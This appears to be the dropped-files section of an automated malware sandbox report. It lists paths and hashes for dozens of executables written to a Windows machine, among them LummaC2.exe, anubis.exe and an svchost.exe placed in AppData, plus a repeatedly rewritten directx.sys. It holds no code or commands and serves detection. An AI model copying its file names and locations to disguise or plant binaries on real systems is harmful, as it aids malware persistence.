SHA512 0c1f3e4b273507a915c9bb0a3d6f546557b7cba5c08f2706f823a76c65299c3268395f21458ca166309506f7d9b0da14701a6c4c569a688732999cde3a2b5720

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SDNFODSHT6QENOUBMNUC.temp

MD5 d1dbe15d6e0097c68f863bc8d7ea9f21
SHA1 8daca1ecd29f632fe44b9c08008d3ecfe2e4cb6b
SHA256 5e3cda961fc12362abdea08ab8c0adc80ed2af7d97803e26f3495843ba4aa6c5
SHA512 d589938d4f76daa8b2401370b2005ca151c87cb011be60e5c0122368eb85723d77c19c19f0756126bb073c33fcbdce92d32b95bc0b0b496b6306aa9e67997378

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 d8fc5fa0f99361678cc7a33224146359
SHA1 9bce5d6759a749c17a5ed1407bba76dd326d2311
SHA256 ffb303a1205f5ce4159f4697fc10dc68c3097168b173b8d5196e3cf47e345658
SHA512 9929b58037e6930b67b4807b536151e6a253414357f212b748a1653cff1e5857149d937c97813a2ba17e9af113b14ea02cd65f2b9421490892229d7b06e5fea2

C:\Users\Admin\AppData\Local\Temp\9E8E5E00

MD5 6f93dad005c10fabfa2257bf3adf00dd
SHA1 a52fe6428c4b631e35c58b1ef9a99935d40010b5
SHA256 e88608c300243b2b05bc962adc6a4f3a7ad073dfd9eafef1c9555bee181c950b
SHA512 081aefc89d2b2bd5a55152bc08e0c4e8ff875bcd961a24e1b2d1fa247a06360cfc3ced0182e8ff765a99d865e362da435e41eacc5bc26bcd352108ebdfeced96

C:\Users\Admin\AppData\Local\Temp\Files\Team.exe

MD5 2f208b17f8bda673f6b4f0dacf43d1bf
SHA1 5131b890e8f91770039a889e72464b5ce411c412
SHA256 1fc3e92f7f30f4f68861d3ceb8284853ae30c11cbd0ed3e46ea9eb698b3ec348
SHA512 2830984abc5476e23609c947304f1124fd33f38e654b98bccbcde44e7fbadb75584983243e83a006b69403ac3d42ab379e1665989bec368320efdd5e98ad62df

C:\Windows\directx.sys

MD5 c5e9da989ca59a964c0dcae134443a4b
SHA1 cd7afbbee826cf0238dffcbeadb943c8e3f903b3
SHA256 90518bf9c2e8eaeafebda5104ede1eb7f956e13f929e80e45c0628dc697acefe
SHA512 71e8aa97bbe6ff5156f05f93ba7c6f13af882d135a4d7f175dbb2f33c47bd0e48122ac9e311537acbc60b876ead23be0de563c4b0c6f52526588e117e1046a99

C:\Users\Admin\AppData\Local\Temp\Files\test10.exe

MD5 0f0e9f3b9a70d62ae4bc66a93b604146
SHA1 e516287a1a99aac6c296083a4545a6a6981a9352
SHA256 f38408d7e7dd4873930980fedfa841d515d3b4e12a7f33ba1d384c627186afda
SHA512 42940fc6103c07ee8d113fe46aff26d34cb53c8244bb60e1763efafb295ed7197133ef270dc0709641b8403aeee257119ed0492b0efcccf0607109f1e2112881

C:\Windows\directx.sys

MD5 f622e88b52599e3f74c303953984bf98
SHA1 39bdb50bd99675e7e4c5064662a0048d47906a82
SHA256 6ab1fcae830dce462f2b61c094191e6dfed001fb6ba670ef1a91451dd3ed3c5b
SHA512 c0d86148e28a705f1efd0819e0b808a5b38f07bcd3353289e462b256b42e2359f662df78e87302d1122b99c0acb80a9fe97ace990d41bcb985319399379a337a

C:\Users\Admin\AppData\Local\Temp\Files\02.08.2022.exe

MD5 564be60ec38590b61733648812b66536
SHA1 881f071bee59ba856b45a1fe11e7ed1d2123b017
SHA256 d9b41aeaaf67efd6370b267ab33dc39f149cbe9fd3f6dec30734f360e8ebfc6c
SHA512 2b6bed6c03b30cb659ad87c47328a853d73ec06cf48dff3472e9d7cf5a91cb7d5bace4b0c96df193a9c624dca796c580f4fd1f782fad2fbce280b8f018272c90

C:\Windows\directx.sys

MD5 c969ede1d34e53d4ee4174f3d036b225
SHA1 4667ce3cf83e5642759b522e270bacfd9c9e9e5f
SHA256 37371f0f4112550712b06db9c023a2f2f16f6d1adb7a3045ac02dd52eb062fc0
SHA512 144ef0150986b03bba205c633ff4051da4ecfe04ac215bb2f412df084978ae221d987712f0f3dadbf0a145e5d029dbbcf97bb291fbc2243e94ef90d8cbc8524d

C:\Users\Admin\AppData\Local\Temp\Files\test6.exe

MD5 6383ec21148f0fb71b679a3abf2a3fcc
SHA1 21cc58ccc2e024fbfb88f60c45e72f364129580f
SHA256 49bf8246643079a1ec3362f85d277ce13b3f78d8886c87ee8f5a76442290adde
SHA512 c6866039fc7964737cd225709930470e4efe08dc456b83b5b84d9f136c7d0734d2cce79f3b36c7c8e4b1559b2348c8fca981b2cce05f1c0b8f88ec7c7f532125

C:\Windows\directx.sys

MD5 7291858227ad8025b569d59412dab0f7
SHA1 b923bbe20f138250c1ed4622bb87704adb8814f4
SHA256 595612e204ddf6e2f6b4aec44c29c9e868927033c987588864852762029efef2
SHA512 ec3e6f69c6e811558a30b5fe18b405529d91e6779c3a9aabf30bea11941576defaa8224158c1cb170c077b0e7b254bff5546cac21ec63970c13200fce181e779

C:\Users\Admin\AppData\Local\Temp\Files\Update.exe

MD5 ffc2637acde7b6db1823a2b3304a6c6c
SHA1 8eac6fb5415f9338b1b131c42ed15ea70da22096
SHA256 35efc0520b78a1b413afee5dbe5d8b0674eea2acfc7d943de70a99b5b2fd92ef
SHA512 3f9f0182d69b66ea6168717f8e7239a0726066e011be1983da874f76ee308e67ef55cd08a2d8990cd9e4a663bbbbf56c3445275d72e8330255b3d0dd3b98859a

C:\Windows\directx.sys

MD5 aa9953e8bc92329018dbec54788ac717
SHA1 c42a85db4025801fe5af20caab9234d235e2520c
SHA256 34578269e5e1e399c3be1fbac8dc3d098b72d707d722470d990e72e9707cfb24
SHA512 ac8a85aa1b82b201b78dac3904cd5cb5ee2c08242cf294f72378cf02e9c4fa54471c7027b1b31471fc6d61963c959cd416fd4082e1211de0f17fa9483473a2eb

C:\Users\Admin\AppData\Local\Temp\Files\CompleteStudio.exe

MD5 ee4d5bd9f92faca11d441676ceddcec9
SHA1 64626881b63abc37cd77fca95f524830849dd135
SHA256 d6872d521e977683f9fbf54b80e2a218aec4f0ae9caaa233ca9797f16c37b4d4
SHA512 0daac4bdfc51994877c27f87377d210674c78eb4587a9baef6fbe46f5a1aa8e9ed700d4881356adc66c713562995a5fa5f56ecacc2a84ee2f695f2816fe63752

C:\Windows\directx.sys

MD5 56221cd662b3daea4311f5029033e022
SHA1 791eca3774be7507157442d610c3ca25f9f040d4
SHA256 68ade7213b561689739bfe71d4c653776d0b4e9abaa975826ac97da1b3205028
SHA512 99a5989ccdbd8d6607311ebadcf08953ca65a9815d841a5327528a6f708c58e8f4a2e8f93e5fd542b2c1b13ee60fafc9a0700644954808b96e4dc714a4214ec4

C:\Users\Admin\AppData\Local\Temp\Files\ExtremeInjector.exe

MD5 ee6be1648866b63fd7f860fa0114f368
SHA1 42cab62fff29eb98851b33986b637514fc904f4b
SHA256 e17bf83e09457d8cecd1f3e903fa4c9770e17e823731650a453bc479591ac511
SHA512 d6492d3b3c1d94d6c87b77a9a248e8c46b889d2e23938ddb8a8e242caccb23e8cd1a1fbeffee6b140cf6fd3ea7e8da89190286a912032ce4a671257bd8e3e28a

C:\Windows\directx.sys

MD5 7164615bccb5dfe1960626a65d7f39a9
SHA1 001bdc5cd11128f4e8d7339e4637defffc3b8e1c
SHA256 8eb7301ffe1e4c02bbbd7631d7d678d8401412aa0d850068f49df57705f618b5
SHA512 779821fa273b95cc1df56d8e5c713af57a201652ed8ad04009f8d1b436973426057b5712e31820340f8f54e740e485905be79e05e18af040afa5b0f0733f0dbb

C:\Users\Admin\AppData\Local\Temp\Files\major.exe

MD5 fa3d03c319a7597712eeff1338dabf92
SHA1 f055ba8a644f68989edc21357c0b17fdf0ead77f
SHA256 a08db4c7b7bacc2bacd1e9a0ac7fbb91306bf83c279582f5ac3570a90e8b0f87
SHA512 80226bb11d56e4dc2dbc4fc6aade47db4ca4c539b25ee70b81465e984df0287d5efcadb6ec8bfc418228c61bd164447d62c4444030d31655aaeed342e2507ea1

C:\Windows\directx.sys

MD5 990314d15232eee10c39bd0a40661b24
SHA1 196181e70280408088beb53381ae97f97a4cd6de
SHA256 83cf41dbb010727d022c58b4ccfb45abaf50758fa4ab71bb0ea2a88810a976b7
SHA512 285566a84cf5fb0072c0a1465bcbcde8f16eaf53c097c39230ee8874624e5232bd23e05e6f312353c79ab133ed50ab8f5a2da2fe47a3ff94ea3ca8536736c3cb

C:\Users\Admin\AppData\Local\Temp\Files\anubis.exe

MD5 8391d3b5332c4b1164333ddce388a8c7
SHA1 b982fc92ed38565debf033b0ffaa2181a8caa5e7
SHA256 e201e9a5c9fd3a68f54e2ada061a242df3ed813e56d2b09e2c8efc04953c2f72
SHA512 f42b0ec317a534af6239ec7bfb6ff22e4e3e8abf0316b9a0666b073212f4ba6d989ddce2d40d0ea460e85b245b8637b1801bbf6ca5de9944171af3134cca2c96

C:\Windows\directx.sys

MD5 9d36badb954d214cca8b3e9d58c40784
SHA1 c417b2de109a3d0ec84858ba787da85f5e8bc492
SHA256 a741ba46db56aeb9dc0c27cc8d6fd6e23afe6787c3b5be4f16640106e5888f87
SHA512 49c7cc8a4ef35d9d7ca2fafcafdffc1eca287cd6b8822824720ce24a42ed655f9ec3b9b93c6bb52628dd285de4bc72e75f3a103a919a431bbacc709afcf4ba16

C:\Users\Admin\AppData\Local\Temp\Files\ZZZ.exe

MD5 3663c34a774b45d65edb817e27dcbdae
SHA1 4e9333fbdc6540bc312f6b324df9eb7dafedde2e
SHA256 f203e00cfa3c0ff98670d56ace48c0ee7bf1a997309a8da1379d5291cbe37c3d
SHA512 88c4939f5c2613e7fa62040d3307f9fc0c2f2e0bae4c7c166d5fb6ee6b921c99636dc89935b31c60d4ba45afd5ebdd80ba51914cb37e9e2a604781de89e45c05

C:\Windows\directx.sys

MD5 69daf6661be1b73220d75c2bf5eaa73e
SHA1 0705484494c4c8f5dd145d76089220a406ab9c43
SHA256 a048745d503e007173a56e321037ddeb0adb1e13fac43e292a60969f0f4a8816
SHA512 ec11c727613dc179ef2dc971ec5e2ae6902d5fd46cfd3d61887117a67f935054c9b2b8be2ae98c00f97bce5eb92b82e96117e21f67da65e64a94f6aa4b5a924f

C:\Windows\directx.sys

MD5 fd1ce14e3160fbf86f1bf44dd87a4d45
SHA1 69d5d205a0b1a147c97d4d42a8b073ab79e990e9
SHA256 ca899c67d5fa2f5593b6c09a0af58d90fb69e962e4359e4ec22c55550e57ecb2
SHA512 826225b11c9304c95345b197549414829ec4ea8f52a99db6c0d3379de8c33d5c9ef5b2fbebe4df9e283372248b41e7230cbc654fdb2a5f0d2a79470483b2734c

C:\Users\Admin\AppData\Local\Temp\Files\CrSpoofer.exe

MD5 2e87d4e593da9635c26553f5d5af389a
SHA1 64fad232e197d1bf0091db37e137ef722024b497
SHA256 561c94494c3cd0b918bdf5eb323682fad6596a0a54c4cdd85a99880b4028b3f8
SHA512 0667ddaea41c4c4f21e7bc249384230763c4be7d9c01d6b1cf694da647fbcd66de859afad5f7c88399656da48b349e892f22301380da0bd100199e9c5b23c2e3

C:\Windows\directx.sys

MD5 8b0a995545391b882fc260684f529208
SHA1 89c5f15738b517ddce82013f845adabc0665ff5c
SHA256 264fa8be6e42cbe887633dc906f28d0d760464b874886766514ff5c2d1ce1c6e
SHA512 baf9a6984e4e30b45b8630a0dfcdfc778baa19c946bb4ee1370e187f7b0d5591a3bc14f04abe353f2ba4ea836c80a60666f30162fe08095c574ed89a0b7c5636

C:\Users\Admin\AppData\Local\Temp\Files\compiled.exe

MD5 333e51675c05499cfadd3d5588f0f4ca
SHA1 aca16eda7f33dfb85bed885e2437a8987d7a09e4
SHA256 cdc184f53927538be9c65604552977077e645e7e2d1e491ae357f15c14a78407
SHA512 5c0a9609be977c5ee3561516791437afca6159d82955dc23ede5e6376f66df98d0e2d74f068ad2f350115cddf978450dfc17d0f97493a8128336e76a724ad335

C:\Windows\directx.sys

MD5 9cf429dd4a6a0dd3cf7515dae6ef9327
SHA1 3369feadd4197d7a368c14f1ef9c85631f8e605a
SHA256 8faf5200c821039d77d88884e7a03c79163700021ee5abb7239807bad24405b6
SHA512 7a7a8f6950916729effa1dcc59838f0179b33ff8055fe1ea5f1e4c8b76f2e7ef073da4a3a0c3b03e6eee49e73f691df288637e822db7101d878e874d13cdabf1

C:\Users\Admin\AppData\Local\Temp\Files\Java32.exe

MD5 bc884c0edbc8df559985b42fdd2fc985
SHA1 9611a03c424e0285ab1a8ea9683918ce7b5909ab
SHA256 e848b330ee5a8bd5ae1f6b991551e30a4a5b2e5deeb4718a15b2122101f2c270
SHA512 1b8c97d500de45fbf994dcd9bf65cc78106a62ff0770a362add18866cceebbe9f5e157a77d26cb0d0d8de89abe3d446bc911f33e7027fa8f8809d2720b0cedcc

C:\Windows\directx.sys

MD5 c7a0cc3965520cc38740111fe3f55b61
SHA1 5cef4f1dae112429339f875da60a7d50d67cd78a
SHA256 5d42bd5ddcb1277949583349c95522426094bc8923c8df40daf26326bc090957
SHA512 cf7edeabebda1066a6305d91aabfe2fc3c58074eda009843dc684a7f86f98c9041baefce456d2ca55877edbcfed5b253bf53be3410d7f6cf93c412d735a16380

C:\Windows\directx.sys

MD5 2338780ec1bc1f4b97424a1456262ba2
SHA1 2285ee977709dc1ace6ddcf6bb39e4abc00471d0
SHA256 73d0228c8aaeb6bcbd3d1cac2b2c480d6523eb5a6c9a752e6321bee7c60eba02
SHA512 01326a1e951c8b7550e55075ff32eda424954bec3148dd32f89ddfd91e859f24ab62de53b07f8e2f9e037a5038c1204c5e06b86ce27b58bf5729402b6625f9f1

C:\Users\Admin\AppData\Local\Temp\Files\script.exe

MD5 308d9beab0eccfd8f218a89456b9b7d4
SHA1 b444fa187f2762104248a6ad7d82b1e9e145e366
SHA256 3570eab57ac55e89ce4467d665502896790881a21e93a25aabb738fa368e9e02
SHA512 b74095e5bc85fd4aef7685a18d4e7c64c322ba66823e8da6cd96f8551abf10f6376ac32728d33f72eb616e25587b442ff5a03866821151d64ac2102cffe68955

C:\Windows\directx.sys

MD5 458e721a633dd02ee168373b349fa41f
SHA1 c0a9797406339db9c1483559782ecf005972103b
SHA256 003520e16d86afae6689c72b47f71bddaa48467075f69f6e16c359de81ab9ab6
SHA512 555400787909f3b4300763828f202584153ade87d9e456869b7c713472358f9854aa1ebff62aee0375c1723a888ac8a2ed6166834dd11186d9a4cce83345c012

C:\Users\Admin\AppData\Local\Temp\Files\Meeting.exe

MD5 1ebcc328f7d1da17041835b0a960e1fa
SHA1 adf1fe6df61d59ca7ac6232de6ed3c07d6656a8c
SHA256 6779bc4c64850150de694166f4b215ce25bbaca7d60b293fa7bb65e6bdecbc1a
SHA512 0c537e8dbdf5de433f862a31fbcb5a709f7727783cb36f7ed3dcac1acb44d704d5ad570035259022b46a0370754d029f476ae40280983d1586de9098e31a31d6

C:\Windows\directx.sys

MD5 4520631eeebde97b3595206bb843d7c0
SHA1 9d87ec8f38bd50360a26d7f18b3bbaf3a7c6629e
SHA256 ab33dd8605a379c0c51a0325f873b8cc87388a27015e632f1286cb649a02fccb
SHA512 268628aac8e1a570ac0b3e1c772331ae646d5ef84f0f3988d1cf0731b8d08dd255cfecbb74d54a33d8d559e90c4afd7525776f4f0bd8b396acf26ef2b6584cf9

C:\Windows\directx.sys

MD5 165ca0b749ab573917e42a7880593b98
SHA1 e49654cd0d55efff1f5042a1fc69a64aa36b7e7e
SHA256 316231260744d64cd01dff4ab583cdd1af7554b284fb52161c6c9b5e7740c84d
SHA512 c45c5606ddd1333fa4beb6fa8f1ded9d88977d8d9af1f461df87484cdf5637c9f22018f8950cacae61e1efc12f393c7cf3e5a5ab4a4d2c5a6f2acbe64d83d634

C:\Users\Admin\AppData\Local\Temp\Files\LgendPremium.exe

MD5 c84baaa0b67d15dbc989ca2eb55a9b1c
SHA1 20231d1285e4de0916cc71e7d590313296f9d539
SHA256 9f8b8bd90df6a73c3fbd5eb730ca6866f2de8f09ba273d73e7a91731ca90ae79
SHA512 3decb9123dccef7da39cb2c51ba44b30fc79d68b9192b1e9fec95d3b19d2e77de593bfd6c2601718dc975148608ec21bfe047d103db1ba12fb1f2f954ea3de3f

C:\Users\Admin\AppData\Local\Temp\Files\LummaC2.exe

MD5 9b3eef2c222e08a30baefa06c4705ffc
SHA1 82847ce7892290e76be45b09aa309b27a9376e54
SHA256 8903d4bfe61ca3ca897af368619fe98a7d0ee81495df032b9380f00af41bbfc7
SHA512 5c72c37144b85b0a07077243ffe21907be315e90ba6c268fdb10597f1e3293e52a753dccbfd48578871a032898677c918fa71dc02d6861e05f98f5e718189b73

C:\Windows\directx.sys

MD5 87ce6d7b069cd87bdd151abd8ced7e7a
SHA1 94eeff064ad184c76595a36888f243e442331c3a
SHA256 ffd3911eb4a41072c93bb76e4ba94920c200e191b0d3df867ad8774062e0b65d
SHA512 94643d82e4e60b50dda43347568eb6362a6003fca1496965a7eb7cbe1b2ed466b406e013901c816e7446f7f9f41aaf3ec6fff1b2bbc9fccaebfd4971f68ffb00

C:\Users\Admin\AppData\Local\Temp\Files\XSploitLauncher.exe

MD5 4bd68436e78a4a0f7bb552e349ab418f
SHA1 a1c4c57efd9b246d85a47c523b5e0436b8c24deb
SHA256 a52f8f78ba063951c3e315c562df187b90c257a61585e4682821abf6cefec957
SHA512 070ebca410b909d0e0ce4ba9a8119aa45de42e1c8cffc18916b070e2ad6012f40f1b0784c375e8100a987ce84e71e51da353444241f9301217f159681c3d1bbd

C:\Windows\directx.sys

MD5 72d63b174b3773ce77b634431845a972
SHA1 62bced2f020f057056c81ea03ff1812c2bd94742
SHA256 ff6a52a81e791de64e67cf5515570ba49faf2c0406464f6012b4b52ef8f8e7f3
SHA512 304a6c040a4a3073537b656967bd6ff21064498a5ec88441c51b2a77cd4172adb91db5346acee407db699be5b2c127ccef8643bbd59cfb8d26cc5d6a14ed1d98

C:\Windows\directx.sys

MD5 32775a9411b219ca34dc17a53a1bbcdf
SHA1 085b6cc3b170eba52aba15733210f0bf6c08c87c
SHA256 89f5327c69733ae36ea7f95365bda7cb175fb38a62186faf7d6507040d48496f
SHA512 63081531a1009371574a1d0faa3351ce720f30d6f4588a589d055947a2522ca46565f7cdc91b279d7a6f183c18e9ea404636e0b49f622dc62640c0e5ea5f2095

C:\Users\Admin\AppData\Roaming\svchost.exe

MD5 39476c74921658da58506252acd72f92
SHA1 6b79e09a712dd56e8800ee191f18ead43ba7006a
SHA256 26cab4dad2281e9683c56570546a1940d257ddafcc706af85d60975a4dd2bb65
SHA512 20b43bdd535e9fee2bfc988f83c4cdb72def36631d57a0444f2dccc3f03e1e450655d8eca5555e21b76588bb6228a45a6ee238cb23e8eeffddff618ea379dabd

C:\Windows\directx.sys

MD5 2565f7eba76dcf49918f8dbeea07d9d1
SHA1 bc04a7888ee83fb5896f5e70d63fdf1395133f81
SHA256 939f7408f67db22361275c2ce47458ccafb6b7f7942abfc563d5d113a545fe31
SHA512 cd24dbee32529eb95302d92fe8c174ac978f51172a1b0fb9bf933e7cfbd47050dcfe2f19410858906ee73e193b2835aae5ce6ced2885d980322959ee6b1db8dc

C:\Users\Admin\AppData\Local\Temp\Files\Ukodbcdcl.exe

MD5 25ed0fce4a9df59b3ed88853db8206f3
SHA1 4382f0adb2a94e8a4eccd6aa2d222842000b7895
SHA256 c5b32f1cdc2a48f1dd2b1623598c24a2635dc57fdab3b4328f1cb3b66f5079ba
SHA512 5a329229506e3f9feaefbe477699cc4b8510f949f4b1df0bf5b66ac892404a94fa5effef3d9acbdfa90bb6e494e5799fa721e14a29ec4e0f1e7b97719397939f

C:\Windows\directx.sys

MD5 6b9b9f45e1632060d475e787f583d7d5
SHA1 efb82ce05015771ece14c411db4095cc1c8c75a9
SHA256 4beda534bf5d4da7763ba8fd127d15e48742aeee5402a2e0d48f59f960edf7cc
SHA512 e165f4f36b590ee1aa782ed0157d9fc7ba8d84d5c528c194c8d195c0fed7b8be740cb6aed53ef7156840de36361b41f2da43a37a0c8832edae0c055e1a502a14

C:\Users\Admin\AppData\Local\Temp\Files\Operation6572.exe

MD5 913bdfccaaed0a1ed80d2c52e5f5d7c3
SHA1 9befba3d43ace45a777d2e936e1046e7a0fb634c
SHA256 93e66ad3eea5b3217d9a016cb96951ab2dd0ae3f3ef6c2782667abacaaa8018f
SHA512 1999d174e14b96ccb35dc8ffa2cc576aff9d01d9373654a2a0f78342735e8b637f605144f5c56e922dc5ee43afb82e62ab9f21e0ecfd33a1b8369344346f90e6

C:\Windows\directx.sys

MD5 e68569c4801699b3cb99d6099c1162ea
SHA1 209555eeb6b800970a225227e714a4659c7a4ec7
SHA256 fc013ca86b76569251e12ecdd3205e14ca2793eb4dfe116046a6c10abb2759c1
SHA512 b3d0da21f1ae519daa22abd3bc28c183de7531a991d53daf060693f819b64c2aaac0463871d0708658d7ac79c6b5608389c909312286b74c7c8290f7c26bb2aa

C:\Windows\directx.sys

MD5 a051804a55e27000cf84a88614b7a591
SHA1 54b245c1ab6e77755aacc7d8878b0a65fa24be3f
SHA256 9910f538a1d96eca1278b8ab1093f3b3805b873ce8267517e8e9c650ed48c716
SHA512 11607d2379b7aa85c656b789ccf0b8c6d15adc735c16c16b4276eac73d08c1238367044ecd8abda0acec464319a4d6ac8cf21c6d10671f9bbf755da2e2f1039a

C:\Windows\directx.sys

MD5 8a23e6c5964ee5698ede762f68caa8f2
SHA1 04aba5515e02d58c3e3b2f64d6f510b45ba249e5
SHA256 f6ebca18cffed9fad751fd0998a897b163f637b0095da8eb951de347533ddf91
SHA512 25229e2524941f82f33c6b4d97fc809e6fd50bf0d715bbe60ecca579537d035ed32d67fa8d36c1b0f18a72d2cbac00ba1e70d962c3bf579d8d8119a90f70b600